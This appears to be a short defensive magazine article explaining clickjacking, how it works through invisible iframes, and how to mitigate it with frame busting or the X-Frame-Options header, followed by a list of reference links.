What is clickjacking

In short hijacking your click is called clickjacking. Clickjacking attacks delude web users to click on a link or perform some actions which they don’t want to by rendering an invisible page element on top of the action the user thinks they are performing. This can cause site users to visit unwanted web pages, provide username/password or sensitive information or download malware. Clickjacking won’t affect the web site directly, but it could potentially affect the website users. What could a hacker do with a clickjacking attack? • Harvest login credentials by rendering a fake login box on top of the real one. • Trick users into turning on their web-cam or microphone. • Spread worms on social media sites. • Spread malware by diverting users to malicious download links.

How could a hacker perform this attack?

Typically this attack is performed by hiding the target website's UI and arranging the visible UI so that the user isn't aware of clicking the target website. Due to this UI arrangement, this kind of attack is also known as UI redressing or UI redress attack. Clickjacking attacks wrap a page the user trusts in an iframe, then renders invisible elements on top of the frame. To ensure that your site doesn’t get used in a clickjacking attack, you need to make sure it cannot be wrapped in an iframe by a malicious site.

Is your site vulnerable to Clickjacking?

A basic way to test if your site is vulnerable to clickjacking is to create an HTML page and include your website in an iframe. If the above code works for your website, then your website has this vulnerability.

Clickjacking mitigation

There are two general ways to defend against clickjacking:

● Client-side methods – the most common is called Frame Busting. Client-side methods can be effective in some cases, but are considered not to be a best practice, because they can be easily bypassed.

● Server-side methods – the most common is X-Frame-Options. Server side methods are recommended by security experts as an effective way to defend against clickjacking. Mitigating clickjacking with X-Frame Options The X-Frame-Options response header is passed as part of the HTTP response of a web page, indicating whether or not a browser should be allowed to render a page inside a or

tag. There are three values allowed for the X-Frame-Options header:

1. DENY – does not allow any domain to display this page within a frame
2. SAMEORIGIN – allows the current page to be displayed in a frame on another page, but only within the current domain
3. ALLOW-FROM URI – allows the current page to be displayed in a frame, but only in a specific URI – for example www.example.com/frame-page

Reference

1.https://www.imperva.com/learn /application security/clickjacking/

2.https://cheatsheetseries.owasp. org/cheatsheets/Clickjacking_D

3.efense_Cheat_Sheet.html#Defe nding_with_X-Frame Options_Response_Headers 4.https://auth0.com/blog/preven ting-clickjacking-attacks/

5.http://www.sectheory.com/click jacking.html

To read the full magazine, please click here.